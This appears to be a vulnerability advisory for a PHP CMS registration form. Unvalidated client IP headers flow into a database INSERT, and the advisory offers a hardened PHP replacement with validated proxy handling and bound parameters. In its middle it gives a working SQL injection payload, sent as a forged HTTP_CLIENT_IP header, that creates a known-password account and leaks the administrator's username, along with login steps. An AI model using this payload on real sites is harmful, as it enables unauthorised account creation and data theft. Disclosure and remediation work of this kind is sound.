Related Articles: http://www.bkjia.com/Article/201211/168584.html
Vulnerable file: Client.class.php, line 29

    public static function get_user_ip() {
        // Client-supplied headers are consulted first and returned without validation
        if (getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
            $onlineip = getenv('HTTP_CLIENT_IP');
        } elseif (getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
            $onlineip = getenv('HTTP_X_FORWARDED_FOR');
        } elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
            $onlineip = getenv('REMOTE_ADDR');
        } elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
            $onlineip = $_SERVER['REMOTE_ADDR'];
        }
        return $onlineip;
    }
    /* Obviously, client_ip can be forged and used for injection */

RegsiterController.php, line 145

    private function reg($data) {
        if (empty($data)) return false;
        $data['groupid'] = 1;
        $data['regdate'] = time();
        $data['regip']   = client::get_user_ip(); // get_user_ip() is used here; this is where the vulnerability arises
        $data['status']  = $this->memberconfig['status'] ? 0 : 1;
        $data['modelid'] = (!isset($data['modelid']) || empty($data['modelid'])) ? $this->memberconfig['modelid'] : $data['modelid'];
        if (!isset($this->membermodel[$data['modelid']])) $this->memberMsg('Membership model does not exist. Please contact the administrator.');
        if ($this->memberconfig['uc_use'] == 1) {
            if (uc_get_user($data['username'])) {
                $this->memberMsg('The user does not need to be registered. Please log on and activate it directly!', url('member/login'), 1);
            }
            $uid = uc_user_register($data['username'], $data['password'], $data['email']);
            if ($uid <= 0) {
                if ($uid == -1) {
                    $this->memberMsg('Invalid user name');
                } elseif ($uid == -2) {
                    $this->memberMsg('Contains words that are not allowed to be registered');
                } elseif ($uid == -3) {
                    $this->memberMsg('User name already exists');
                } elseif ($uid == -4) {
                    $this->memberMsg('Incorrect Email format');
                } elseif ($uid == -5) {
                    $this->memberMsg('Email is not allowed to be registered');
                } elseif ($uid == -6) {
                    $this->memberMsg('This Email has been registered');
                } else {
                    $this->memberMsg('Undefined');
                }
            } else {
                $username = $data['username'];
            }
        }
        $data['password'] = md5($data['password']);
        $userid = $this->member->insert($data); // regip reaches the INSERT unvalidated
        return $userid;
    }
Exp: when submitting the registration form, forge the client_ip value (the HTTP_CLIENT_IP header read by get_user_ip) with the following content:

    sb', '1', '6'), ('hell', '1b192f49ddec03d0c7e777d3e578cebf', (select username from fn_user where userid = 1), '1', '000000', 'sbd', '1', '6') #

After the registration succeeds, log in as user: hell, password: sbdan. The administrator's user name is shown in the mailbox field.
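
A hardened counterpart to get_user_ip() and to the insert in reg(), added here as an example and not the CMS's own code: the address is taken from REMOTE_ADDR (or from a validated X-Forwarded-For hop behind a proxy you operate) and is bound as a query parameter. The name get_user_ip_safe, the $trustedProxies list, the member table and the sample requests are assumptions, and the demo needs the pdo_sqlite extension.

```php
<?php
// Added example, not the CMS's code. $trustedProxies, the table layout and
// every sample value below are constructed for illustration.
function get_user_ip_safe(array $server, array $trustedProxies = []): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return '0.0.0.0'; // no usable peer address
    }
    // HTTP_CLIENT_IP is never read. X-Forwarded-For counts only when the direct
    // peer is a proxy we operate, and is walked right to left.
    $xff = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff !== '' && in_array($remote, $trustedProxies, true)) {
        foreach (array_reverse(array_map('trim', explode(',', $xff))) as $hop) {
            if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
                break; // malformed chain: fall back to REMOTE_ADDR
            }
            if (!in_array($hop, $trustedProxies, true)) {
                return $hop; // nearest hop that is not one of our proxies
            }
        }
    }
    return $remote;
}

// Constructed requests: a forged Client-IP, and a proxied request with a tainted chain.
$forged  = ['REMOTE_ADDR' => '203.0.113.7', 'HTTP_CLIENT_IP' => "x', '1'), ('extra-row', '1') #"];
$proxied = ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => "9.9.9.9', 'x, 198.51.100.9"];
echo get_user_ip_safe($forged), "\n";
echo get_user_ip_safe($proxied, ['10.0.0.5']), "\n";

// Second layer: bind regip as a parameter so even a raw header stays data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE member (username TEXT, regip TEXT)');
$stmt = $db->prepare('INSERT INTO member (username, regip) VALUES (?, ?)');
$stmt->execute(['alice', $forged['HTTP_CLIENT_IP']]);
echo $db->query('SELECT COUNT(*) FROM member')->fetchColumn(), " row(s) inserted\n";
```

Either layer alone stops the injection described above; keeping both means a later caller that bypasses the validator still cannot change the shape of the INSERT.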